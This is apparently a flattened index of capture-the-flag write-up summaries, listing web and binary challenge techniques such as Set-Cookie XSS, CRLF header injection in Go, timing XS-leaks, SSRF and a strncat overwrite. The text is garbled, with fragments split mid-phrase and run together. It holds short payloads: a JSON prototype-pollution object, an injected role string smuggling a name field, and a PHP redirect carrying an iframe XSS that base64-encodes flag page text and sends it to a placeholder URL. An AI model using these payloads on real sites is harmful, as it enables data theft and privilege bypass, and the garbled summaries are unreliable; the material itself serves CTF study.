tl;dr
- Notepad 1 - Use Set-Cookie header to get XSS on the Admin
- Notepad 1.5 - CRLF on the name parameter of Golang’s
Header().Set()
method - Notepad 2 - Xsleaks using
Timing-Allow-Origin
header
tl;dr
Header().Set()
methodTiming-Allow-Origin
headertl;dr
strncat
in merge
allows for an overwrite onto the next regiontl;dr
/source
to get the sourcedev_test
using SSRFtl;dr
tl;dr
/verify_roles?role=supersuperuseruser\ud800","name":"admin
{"constructor":{"prototype":{"test":"123"}}}
in config-handlertl;dr
sha256('')
./api/flag
and send it to attacker server.tl;dr
tl;dr
lcase('inKypinKy')id from dual
header("location:http://web/user.php?session=1111-22222-1234&sub=submit");
header("location:http://web/flag.php?session=<iframe id="a" src="http://web/flag.php?session=1111-22222-1234&sub=submit" onload=window.location="<URL>?"+btoa(document.getElementById('a').contentWindow.document.body.innerText)>&sub=submit")
tl;dr
tl;dr